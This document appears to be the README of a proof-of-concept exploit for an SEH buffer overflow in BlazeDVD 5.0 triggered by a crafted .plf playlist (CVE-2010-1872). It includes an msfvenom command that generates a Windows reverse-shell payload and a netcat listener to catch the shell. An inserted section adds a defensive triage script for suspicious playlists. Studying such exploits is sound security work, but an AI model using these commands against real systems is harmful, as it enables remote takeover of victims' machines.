Introduction
# BlazeDVD 5.0 - '.PLF' Playlist SEH Buffer Overflow Exploit (CVE-2010-1872)
Proof-of-Concept (PoC) exploit targeting a buffer overflow vulnerability in BlazeDVD version 5.0 via a crafted `.plf` playlist file. The exploit uses **SEH (Structured Exception Handler) overwrite** to achieve code execution.
## 📌 Details
- **Software:** BlazeDVD
- **Version:** 5.0
- **Vulnerability:** Buffer Overflow via `.plf` file
- **Technique:** Structured Exception Handler (SEH) Overwrite
- **CVE:** [CVE-2010-1872](https://nvd.nist.gov/vuln/detail/CVE-2010-1872)
- **Tested on:** Windows XP SP3 (DEP and ASLR disabled)
## ⚠️ Disclaimer
This code is for **educational and research purposes only**. Any misuse of this code may violate local or international laws. I do not take any responsibility for damage caused by improper use.
## 🧠 How It Works
The exploit generates a malicious `.plf` file which, when opened in BlazeDVD, triggers a buffer overflow and overwrites the SEH (Structured Exception Handler), redirecting execution to a reverse shell payload.
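A defender-side triage check for the crafted-playlist vector described above, added here as an example; it is not part of the original README or `exploit.c`. It assumes a `.plf` file is a line-oriented list of file paths (an assumption about the format) and flags entries longer than Windows `MAX_PATH` or containing control bytes; `triage_plf` and the sample data are hypothetical and constructed for this example.

```python
import sys

MAX_PATH = 260  # Windows MAX_PATH: upper bound for a legitimate path entry


def triage_plf(data: bytes, max_entry: int = MAX_PATH):
    """Return (line_number, reason) findings for the raw bytes of a playlist.

    Assumption: each line of the playlist holds one file path.
    """
    findings = []
    for lineno, entry in enumerate(data.splitlines(), start=1):
        if len(entry) > max_entry:
            findings.append((lineno, f"entry is {len(entry)} bytes, limit {max_entry}"))
        # Control bytes (other than tab) never belong in a file path.
        control = sum(1 for b in entry if (b < 0x20 and b != 0x09) or b == 0x7F)
        if control:
            findings.append((lineno, f"{control} control byte(s) in entry"))
    return findings


# Constructed samples, not taken from any real file.
BENIGN = b"C:\\Movies\\trailer.mpg\r\nD:\\Video\\clip01.avi\r\n"
OVERSIZED = b"C:\\Movies\\" + b"A" * 600 + b".mpg\r\n"

if __name__ == "__main__":
    paths = sys.argv[1:]
    if not paths:
        # No files given: run the check over the constructed samples.
        for name, sample in (("BENIGN", BENIGN), ("OVERSIZED", OVERSIZED)):
            print(name, triage_plf(sample) or "clean")
    for path in paths:
        with open(path, "rb") as fh:
            for lineno, reason in triage_plf(fh.read()):
                print(f"{path}:{lineno}: {reason}")
```

This is a heuristic for quarantining suspicious playlists at a mail or file gateway; a clean result does not prove a file is safe.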
## 🛠️ Usage
1. **Generate the Shellcode with msfvenom**
Use `msfvenom` to create a reverse shell payload formatted as a C array (`-f c`), avoiding bad characters.
```bash
msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=8443 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
```
Replace the shellcode inside the exploit script with the output from msfvenom.
2. **Start Netcat (Listener)**
In another terminal, start listening on the selected port 8443:
```shell
nc -lvnp 8443
```
3. **Catch the Reverse Shell**
If successful, a reverse shell will connect to your listener.
File snapshot
[4.0K] /data/pocs/3a0672780f0e661311fd838de2a2b63a6aa9575a
├── [3.6K] exploit.c
└── [1.6K] README.md
0 directories, 2 files